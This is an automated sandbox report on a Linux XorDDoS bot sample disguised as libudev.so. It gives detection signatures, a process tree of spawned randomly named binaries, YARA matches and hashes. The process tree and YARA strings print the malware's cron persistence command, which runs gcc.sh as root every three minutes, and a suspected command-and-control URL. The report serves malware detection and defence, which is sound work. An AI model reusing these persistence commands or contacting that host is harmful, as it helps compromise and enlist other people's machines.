Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
libudev.so

Overview

General Information

Sample Name:libudev.so
Analysis ID:660268
MD5:7dc92a289a05c45d4179a322344ad09c
SHA1:be912477f64a1ee9f2d8ddaebce6efdfd00e7ccd
SHA256:8642022960d919321ccfcfb0a0cd631db0e5dac3e75014fc0c4cc6ff413c72c5
Tags:32elfxorddos
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected XorDDoS Bot
Snort IDS alert for network traffic
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Machine Learning detection for sample
Writes ELF files to disk
Yara signature match
Drops files with innocent-looking names
PID-file does not contain an ASCII number
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Reads CPU information from /proc indicative of miner or evasive malware
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:660268
Start date and time: 09/07/202218:43:052022-07-09 18:43:05 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 57s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:libudev.so
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.linSO@0/19@5/0
  • VT rate limit hit for: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp
Command:/tmp/libudev.so
PID:6230
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • libudev.so (PID: 6230, Parent: 6124, MD5: 7dc92a289a05c45d4179a322344ad09c) Arguments: /tmp/libudev.so
    • libudev.so New Fork (PID: 6231, Parent: 6230)
      • libudev.so New Fork (PID: 6234, Parent: 6231)
        • update-rc.d (PID: 6235, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d libudev.so defaults
          • systemctl (PID: 6241, Parent: 6235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • sh (PID: 6236, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • sh New Fork (PID: 6237, Parent: 6236)
        • sed (PID: 6237, Parent: 6236, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • libudev.so New Fork (PID: 6263, Parent: 6231)
        • mljnlxkfff (PID: 6264, Parent: 6263, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff id 6231
      • libudev.so New Fork (PID: 6266, Parent: 6231)
        • mljnlxkfff (PID: 6267, Parent: 6266, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6268, Parent: 6231)
        • mljnlxkfff (PID: 6269, Parent: 6268, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff su 6231
      • libudev.so New Fork (PID: 6271, Parent: 6231)
        • mljnlxkfff (PID: 6272, Parent: 6271, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff "cat resolv.conf" 6231
      • libudev.so New Fork (PID: 6273, Parent: 6231)
        • mljnlxkfff (PID: 6275, Parent: 6273, MD5: d750c8beac9f7e938ed3d56311d9b66c) Arguments: /usr/bin/mljnlxkfff ifconfig 6231
      • libudev.so New Fork (PID: 6280, Parent: 6231)
        • jjfbelholv (PID: 6281, Parent: 6280, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv id 6231
      • libudev.so New Fork (PID: 6283, Parent: 6231)
        • jjfbelholv (PID: 6284, Parent: 6283, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv whoami 6231
      • libudev.so New Fork (PID: 6286, Parent: 6231)
        • jjfbelholv (PID: 6287, Parent: 6286, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv pwd 6231
      • libudev.so New Fork (PID: 6289, Parent: 6231)
        • jjfbelholv (PID: 6290, Parent: 6289, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv "sleep 1" 6231
      • libudev.so New Fork (PID: 6291, Parent: 6231)
        • jjfbelholv (PID: 6292, Parent: 6291, MD5: 49d50c6d28b847418207973b5aeb45e4) Arguments: /usr/bin/jjfbelholv "cd /etc" 6231
      • libudev.so New Fork (PID: 6298, Parent: 6231)
        • trcmbxxcta (PID: 6299, Parent: 6298, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta who 6231
      • libudev.so New Fork (PID: 6301, Parent: 6231)
        • trcmbxxcta (PID: 6302, Parent: 6301, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta "sleep 1" 6231
      • libudev.so New Fork (PID: 6303, Parent: 6231)
        • trcmbxxcta (PID: 6304, Parent: 6303, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta who 6231
      • libudev.so New Fork (PID: 6306, Parent: 6231)
        • trcmbxxcta (PID: 6307, Parent: 6306, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta uptime 6231
      • libudev.so New Fork (PID: 6309, Parent: 6231)
        • trcmbxxcta (PID: 6310, Parent: 6309, MD5: e93ee3f4ded35ceeab60752300a344d0) Arguments: /usr/bin/trcmbxxcta uptime 6231
      • libudev.so New Fork (PID: 6315, Parent: 6231)
        • ctwojuywol (PID: 6316, Parent: 6315, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol "netstat -antop" 6231
      • libudev.so New Fork (PID: 6318, Parent: 6231)
        • ctwojuywol (PID: 6319, Parent: 6318, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol pwd 6231
      • libudev.so New Fork (PID: 6321, Parent: 6231)
        • ctwojuywol (PID: 6322, Parent: 6321, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol bash 6231
      • libudev.so New Fork (PID: 6324, Parent: 6231)
        • ctwojuywol (PID: 6325, Parent: 6324, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol bash 6231
      • libudev.so New Fork (PID: 6327, Parent: 6231)
        • ctwojuywol (PID: 6328, Parent: 6327, MD5: 637b8bb85e23041fe2f4a3767c0e251b) Arguments: /usr/bin/ctwojuywol "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6334, Parent: 6231)
        • fsqerkomug (PID: 6335, Parent: 6334, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug ls 6231
      • libudev.so New Fork (PID: 6337, Parent: 6231)
        • fsqerkomug (PID: 6338, Parent: 6337, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6339, Parent: 6231)
        • fsqerkomug (PID: 6340, Parent: 6339, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug "netstat -an" 6231
      • libudev.so New Fork (PID: 6342, Parent: 6231)
        • fsqerkomug (PID: 6343, Parent: 6342, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6345, Parent: 6231)
        • fsqerkomug (PID: 6346, Parent: 6345, MD5: e446fff5f449758979147b09c39cef27) Arguments: /usr/bin/fsqerkomug whoami 6231
      • libudev.so New Fork (PID: 6351, Parent: 6231)
        • cjrbrkowir (PID: 6352, Parent: 6351, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "ls -la" 6231
      • libudev.so New Fork (PID: 6354, Parent: 6231)
        • cjrbrkowir (PID: 6355, Parent: 6354, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "echo \"find\"" 6231
      • libudev.so New Fork (PID: 6356, Parent: 6231)
        • cjrbrkowir (PID: 6358, Parent: 6356, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "netstat -an" 6231
      • libudev.so New Fork (PID: 6359, Parent: 6231)
        • cjrbrkowir (PID: 6360, Parent: 6359, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6362, Parent: 6231)
        • cjrbrkowir (PID: 6364, Parent: 6362, MD5: 671fb9e6c4188b2c387307ee031f7816) Arguments: /usr/bin/cjrbrkowir "cd /etc" 6231
      • libudev.so New Fork (PID: 6369, Parent: 6231)
        • ypclxoxcxk (PID: 6370, Parent: 6369, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk ifconfig 6231
      • libudev.so New Fork (PID: 6372, Parent: 6231)
        • ypclxoxcxk (PID: 6373, Parent: 6372, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk uptime 6231
      • libudev.so New Fork (PID: 6375, Parent: 6231)
        • ypclxoxcxk (PID: 6376, Parent: 6375, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk "ps -ef" 6231
      • libudev.so New Fork (PID: 6377, Parent: 6231)
        • ypclxoxcxk (PID: 6378, Parent: 6377, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk id 6231
      • libudev.so New Fork (PID: 6380, Parent: 6231)
        • ypclxoxcxk (PID: 6382, Parent: 6380, MD5: 189fa45a47a27aedf70f0e8468d9facb) Arguments: /usr/bin/ypclxoxcxk "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6388, Parent: 6231)
        • uhyqxsqece (PID: 6389, Parent: 6388, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece uptime 6231
      • libudev.so New Fork (PID: 6391, Parent: 6231)
        • uhyqxsqece (PID: 6392, Parent: 6391, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6393, Parent: 6231)
        • uhyqxsqece (PID: 6394, Parent: 6393, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece uptime 6231
      • libudev.so New Fork (PID: 6396, Parent: 6231)
        • uhyqxsqece (PID: 6397, Parent: 6396, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece "route -n" 6231
      • libudev.so New Fork (PID: 6399, Parent: 6231)
        • uhyqxsqece (PID: 6400, Parent: 6399, MD5: dac7a7f61f77eb41e695ad36523c8faa) Arguments: /usr/bin/uhyqxsqece "ls -la" 6231
      • libudev.so New Fork (PID: 6407, Parent: 6231)
        • tiupbsaswr (PID: 6408, Parent: 6407, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6410, Parent: 6231)
        • tiupbsaswr (PID: 6411, Parent: 6410, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr ifconfig 6231
      • libudev.so New Fork (PID: 6413, Parent: 6231)
        • tiupbsaswr (PID: 6414, Parent: 6413, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr id 6231
      • libudev.so New Fork (PID: 6415, Parent: 6231)
        • tiupbsaswr (PID: 6416, Parent: 6415, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr "ls -la" 6231
      • libudev.so New Fork (PID: 6418, Parent: 6231)
        • tiupbsaswr (PID: 6419, Parent: 6418, MD5: f03f39e4aaf6a5ca7a154972e56405f7) Arguments: /usr/bin/tiupbsaswr who 6231
      • libudev.so New Fork (PID: 6424, Parent: 6231)
        • uijxdyxaco (PID: 6425, Parent: 6424, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco "cd /etc" 6231
      • libudev.so New Fork (PID: 6427, Parent: 6231)
        • uijxdyxaco (PID: 6428, Parent: 6427, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco ls 6231
      • libudev.so New Fork (PID: 6430, Parent: 6231)
        • uijxdyxaco (PID: 6431, Parent: 6430, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco su 6231
      • libudev.so New Fork (PID: 6432, Parent: 6231)
        • uijxdyxaco (PID: 6433, Parent: 6432, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco "ls -la" 6231
      • libudev.so New Fork (PID: 6435, Parent: 6231)
        • uijxdyxaco (PID: 6436, Parent: 6435, MD5: 4f925977b7fa1d98ec538468e3547e28) Arguments: /usr/bin/uijxdyxaco who 6231
      • libudev.so New Fork (PID: 6441, Parent: 6231)
        • bnuowhwlvc (PID: 6442, Parent: 6441, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "netstat -antop" 6231
      • libudev.so New Fork (PID: 6444, Parent: 6231)
        • bnuowhwlvc (PID: 6445, Parent: 6444, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "ls -la" 6231
      • libudev.so New Fork (PID: 6447, Parent: 6231)
        • bnuowhwlvc (PID: 6448, Parent: 6447, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "netstat -antop" 6231
      • libudev.so New Fork (PID: 6450, Parent: 6231)
        • bnuowhwlvc (PID: 6451, Parent: 6450, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc "ls -la" 6231
      • libudev.so New Fork (PID: 6452, Parent: 6231)
        • bnuowhwlvc (PID: 6453, Parent: 6452, MD5: 9731334739440e32b8e810ccddd96c17) Arguments: /usr/bin/bnuowhwlvc id 6231
      • libudev.so New Fork (PID: 6459, Parent: 6231)
        • chrcfbeejh (PID: 6460, Parent: 6459, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh ifconfig 6231
      • libudev.so New Fork (PID: 6462, Parent: 6231)
        • chrcfbeejh (PID: 6463, Parent: 6462, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6464, Parent: 6231)
        • chrcfbeejh (PID: 6466, Parent: 6464, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh "cat resolv.conf" 6231
      • libudev.so New Fork (PID: 6468, Parent: 6231)
        • chrcfbeejh (PID: 6469, Parent: 6468, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh gnome-terminal 6231
      • libudev.so New Fork (PID: 6470, Parent: 6231)
        • chrcfbeejh (PID: 6471, Parent: 6470, MD5: cd015ff5581523f795a9cdff85751e4e) Arguments: /usr/bin/chrcfbeejh id 6231
      • libudev.so New Fork (PID: 6476, Parent: 6231)
        • hfdnmorvjd (PID: 6477, Parent: 6476, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd "cd /etc" 6231
      • libudev.so New Fork (PID: 6479, Parent: 6231)
        • hfdnmorvjd (PID: 6480, Parent: 6479, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd "sleep 1" 6231
      • libudev.so New Fork (PID: 6482, Parent: 6231)
        • hfdnmorvjd (PID: 6483, Parent: 6482, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd bash 6231
      • libudev.so New Fork (PID: 6484, Parent: 6231)
        • hfdnmorvjd (PID: 6486, Parent: 6484, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6489, Parent: 6231)
        • hfdnmorvjd (PID: 6490, Parent: 6489, MD5: 58cfbcd9b56c6de7ce40ba3c465cf465) Arguments: /usr/bin/hfdnmorvjd whoami 6231
      • libudev.so New Fork (PID: 6495, Parent: 6231)
        • mongquumqw (PID: 6496, Parent: 6495, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw bash 6231
      • libudev.so New Fork (PID: 6498, Parent: 6231)
        • mongquumqw (PID: 6499, Parent: 6498, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw who 6231
      • libudev.so New Fork (PID: 6501, Parent: 6231)
        • mongquumqw (PID: 6502, Parent: 6501, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw "netstat -antop" 6231
      • libudev.so New Fork (PID: 6503, Parent: 6231)
        • mongquumqw (PID: 6505, Parent: 6503, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw "netstat -antop" 6231
      • libudev.so New Fork (PID: 6506, Parent: 6231)
        • mongquumqw (PID: 6507, Parent: 6506, MD5: bd91d415d3d25aa31f7fa9f812b79548) Arguments: /usr/bin/mongquumqw pwd 6231
      • libudev.so New Fork (PID: 6512, Parent: 6231)
        • hrrmkhkkhv (PID: 6513, Parent: 6512, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6515, Parent: 6231)
        • hrrmkhkkhv (PID: 6516, Parent: 6515, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv "echo \"find\"" 6231
      • libudev.so New Fork (PID: 6517, Parent: 6231)
        • hrrmkhkkhv (PID: 6519, Parent: 6517, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv ls 6231
      • libudev.so New Fork (PID: 6520, Parent: 6231)
        • hrrmkhkkhv (PID: 6521, Parent: 6520, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv "route -n" 6231
      • libudev.so New Fork (PID: 6523, Parent: 6231)
        • hrrmkhkkhv (PID: 6524, Parent: 6523, MD5: d3379066576970eab5be5293801f397c) Arguments: /usr/bin/hrrmkhkkhv su 6231
      • libudev.so New Fork (PID: 6530, Parent: 6231)
        • cuwlelaebc (PID: 6531, Parent: 6530, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc "echo \"find\"" 6231
      • libudev.so New Fork (PID: 6533, Parent: 6231)
        • cuwlelaebc (PID: 6534, Parent: 6533, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc "ps -ef" 6231
      • libudev.so New Fork (PID: 6536, Parent: 6231)
        • cuwlelaebc (PID: 6537, Parent: 6536, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc whoami 6231
      • libudev.so New Fork (PID: 6539, Parent: 6231)
        • cuwlelaebc (PID: 6540, Parent: 6539, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc whoami 6231
      • libudev.so New Fork (PID: 6541, Parent: 6231)
        • cuwlelaebc (PID: 6542, Parent: 6541, MD5: cc56c8f5e3b21e31509e1f361dd133f0) Arguments: /usr/bin/cuwlelaebc whoami 6231
      • libudev.so New Fork (PID: 6548, Parent: 6231)
        • zpxsvbblcg (PID: 6549, Parent: 6548, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6551, Parent: 6231)
        • zpxsvbblcg (PID: 6552, Parent: 6551, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg su 6231
      • libudev.so New Fork (PID: 6554, Parent: 6231)
        • zpxsvbblcg (PID: 6555, Parent: 6554, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg "ls -la" 6231
      • libudev.so New Fork (PID: 6556, Parent: 6231)
        • zpxsvbblcg (PID: 6558, Parent: 1860, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg who 6231
      • libudev.so New Fork (PID: 6559, Parent: 6231)
        • zpxsvbblcg (PID: 6560, Parent: 1860, MD5: 70ebe03fd6dcf93b8a9c51c469cb3b54) Arguments: /usr/bin/zpxsvbblcg bash 6231
      • libudev.so New Fork (PID: 6567, Parent: 6231)
        • ockerbcjas (PID: 6568, Parent: 6567, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "ps -ef" 6231
      • libudev.so New Fork (PID: 6569, Parent: 6231)
        • ockerbcjas (PID: 6570, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "route -n" 6231
      • libudev.so New Fork (PID: 6572, Parent: 6231)
        • ockerbcjas (PID: 6573, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "ls -la" 6231
      • libudev.so New Fork (PID: 6574, Parent: 6231)
        • ockerbcjas (PID: 6575, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas id 6231
      • libudev.so New Fork (PID: 6577, Parent: 6231)
        • ockerbcjas (PID: 6579, Parent: 1860, MD5: 426eab97bd927ff91d797d8db1c47c99) Arguments: /usr/bin/ockerbcjas "ls -la" 6231
      • libudev.so New Fork (PID: 6584, Parent: 6231)
        • xtzjojyyzf (PID: 6585, Parent: 6584, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf sh 6231
      • libudev.so New Fork (PID: 6586, Parent: 6231)
        • xtzjojyyzf (PID: 6587, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf "grep \"A\"" 6231
      • libudev.so New Fork (PID: 6589, Parent: 6231)
        • xtzjojyyzf (PID: 6590, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf ifconfig 6231
      • libudev.so New Fork (PID: 6591, Parent: 6231)
        • xtzjojyyzf (PID: 6592, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf "sleep 1" 6231
      • libudev.so New Fork (PID: 6594, Parent: 6231)
        • xtzjojyyzf (PID: 6595, Parent: 1860, MD5: 526c1c9eb7c1e1cfc18ada8d78efe0b4) Arguments: /usr/bin/xtzjojyyzf "ifconfig eth0" 6231
      • libudev.so New Fork (PID: 6601, Parent: 6231)
        • blrhrkypbo (PID: 6602, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo whoami 6231
      • libudev.so New Fork (PID: 6603, Parent: 6231)
        • blrhrkypbo (PID: 6604, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo "netstat -an" 6231
      • libudev.so New Fork (PID: 6605, Parent: 6231)
        • blrhrkypbo (PID: 6606, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo uptime 6231
      • libudev.so New Fork (PID: 6608, Parent: 6231)
        • blrhrkypbo (PID: 6609, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo id 6231
      • libudev.so New Fork (PID: 6611, Parent: 6231)
        • blrhrkypbo (PID: 6613, Parent: 1860, MD5: d2d6dfe69121e1075ca6077e908ab83f) Arguments: /usr/bin/blrhrkypbo top 6231
  • systemd New Fork (PID: 6243, Parent: 6242)
  • snapd-env-generator (PID: 6243, Parent: 6242, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
libudev.soJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    libudev.soMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
    • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
    • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
    • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
    • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
    libudev.soXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
    • 0x6b0c4:$st0: BB2FA36AAA9541F0
    • 0x6b0d4:$st0: BB2FA36AAA9541F0
    • 0x6b0e4:$st0: BB2FA36AAA9541F0
    • 0x6b0f4:$st0: BB2FA36AAA9541F0
    • 0x6b104:$st0: BB2FA36AAA9541F0
    • 0x6b114:$st0: BB2FA36AAA9541F0
    • 0x6b124:$st0: BB2FA36AAA9541F0
    • 0x6b134:$st0: BB2FA36AAA9541F0
    • 0x6b144:$st0: BB2FA36AAA9541F0
    • 0x6b154:$st0: BB2FA36AAA9541F0
    • 0x6b164:$st0: BB2FA36AAA9541F0
    • 0x6b174:$st0: BB2FA36AAA9541F0
    • 0x6b184:$st0: BB2FA36AAA9541F0
    • 0x6b194:$st0: BB2FA36AAA9541F0
    • 0x6b1a4:$st0: BB2FA36AAA9541F0
    • 0x6b1b4:$st0: BB2FA36AAA9541F0
    • 0x6b1c4:$st0: BB2FA36AAA9541F0
    • 0x6b1d4:$st0: BB2FA36AAA9541F0
    • 0x6b1e4:$st0: BB2FA36AAA9541F0
    • 0x6b1f4:$st0: BB2FA36AAA9541F0
    • 0x6b204:$st0: BB2FA36AAA9541F0
    SourceRuleDescriptionAuthorStrings
    /usr/bin/hfdnmorvjdJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/hfdnmorvjdMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
      • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
      • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
      • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
      • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
      /usr/bin/ctwojuywolJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        /usr/bin/ctwojuywolMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
        • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
        • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
        • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
        • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
        /usr/bin/ctwojuywolXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
        • 0x6b0c4:$st0: BB2FA36AAA9541F0
        • 0x6b0d4:$st0: BB2FA36AAA9541F0
        • 0x6b0e4:$st0: BB2FA36AAA9541F0
        • 0x6b0f4:$st0: BB2FA36AAA9541F0
        • 0x6b104:$st0: BB2FA36AAA9541F0
        • 0x6b114:$st0: BB2FA36AAA9541F0
        • 0x6b124:$st0: BB2FA36AAA9541F0
        • 0x6b134:$st0: BB2FA36AAA9541F0
        • 0x6b144:$st0: BB2FA36AAA9541F0
        • 0x6b154:$st0: BB2FA36AAA9541F0
        • 0x6b164:$st0: BB2FA36AAA9541F0
        • 0x6b174:$st0: BB2FA36AAA9541F0
        • 0x6b184:$st0: BB2FA36AAA9541F0
        • 0x6b194:$st0: BB2FA36AAA9541F0
        • 0x6b1a4:$st0: BB2FA36AAA9541F0
        • 0x6b1b4:$st0: BB2FA36AAA9541F0
        • 0x6b1c4:$st0: BB2FA36AAA9541F0
        • 0x6b1d4:$st0: BB2FA36AAA9541F0
